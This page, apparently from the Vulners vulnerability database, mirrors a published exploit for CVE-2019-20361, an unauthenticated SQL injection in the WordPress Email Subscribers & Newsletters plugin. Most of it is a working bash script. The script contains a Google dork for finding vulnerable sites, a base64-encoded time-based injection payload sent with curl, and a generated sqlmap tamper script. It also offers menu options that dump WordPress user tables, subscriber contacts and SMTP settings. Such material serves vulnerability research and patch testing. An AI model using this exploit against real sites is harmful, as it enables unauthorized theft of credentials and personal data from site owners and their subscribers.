Vulners
Lucene search
WordPress Email Subscribers And Newsletters 4.2.2 SQL Injection
🗓️ 27 Jul 2020 00:00:00Reported by KBA at Sogeti EsecType 
packetstorm🔗 packetstormsecurity.com👁 285 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | WordPress Email Subscribers & Newsletters 4.2.2 Plugin - (hash) SQL Injection (Unauthenticated) | 27 Jul 202000:00 | – | zdt |
 | CVE-2019-20361 | 8 Jan 202000:00 | – | attackerkb |
 | Exploit for SQL Injection in Icegram Email_Subscribers_\&_Newsletters | 18 Mar 202100:22 | – | githubexploit |
 | CVE-2019-20361 | 9 Dec 202015:35 | – | circl |
 | WordPress Email Subscribers & Newsletters SQL Injection Vulnerability | 8 Jan 202000:00 | – | cnvd |
 | CVE-2019-20361 | 8 Jan 202005:03 | – | cve |
 | CVE-2019-20361 | 8 Jan 202005:03 | – | cvelist |
 | WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) | 26 Jul 202000:00 | – | exploitdb |
 | WordPress Email Subscribers and Newsletter Hash SQLi Scanner | 9 Dec 202017:41 | – | metasploit |
 | CVE-2019-20361 | 8 Jan 202006:15 | – | nvd |
10
`# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi
url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
gen_sqlmap_tamper
sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
echo ' SQLMap base command : ' "$sqlmap_cmd"
while true
do
sleep 1
echo ''
echo " Possible choices: "
echo ''
echo " 0) Exit"
echo " 1) Simple vulnerability test SLEEP(5)"
echo " 2) Vulnerability test with SQLMap "
echo " 3) Get WP users data"
echo " 4) Get subscribers information"
echo " 5) Get 'Simple WP SMTP' settings"
echo ''
echo -n ' Choice number => '
read n
case $n in
0) exit ;;
1) echo 'Testing SLEEP(5)...'
{ time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;
2) $sqlmap_cmd ;;
3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
*) echo "Invalid option" ;;
esac
done
}
header () {
echo ''
echo ' ################################################################################################';
echo ' # ___ ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #';
echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #';
echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #';
echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #';
echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #';
echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #';
echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #';
echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #';
echo ' # \/__/ \/__/ \/__/ \/__/ #';
echo ' # ___ ___ ___ ___ #';
echo ' # /\ \ /\ \ /\ \ /\ \ #';
echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #';
echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #';
echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #';
echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #';
echo ' # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #';
echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #';
echo ' # \:\__\ \::/ / \:\__\ \:\__\ #';
echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #';
echo ' # #';
echo ' # #';
echo ' ################################################################################################';
echo ''
}
raw_commands () {
echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
-T wp_users,wp_usermeta --dump
-T wp_ig_contacts --dump
--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
}
gen_sqlmap_tamper () {
touch /tmp/__init__.py
cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
param = '{"contact_id":"'
param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
param += '","campaign_id":"100","message_id":"100","email":"[email protected]","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
#print(param%payload)
return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}
main $@
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jul 2020 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.2812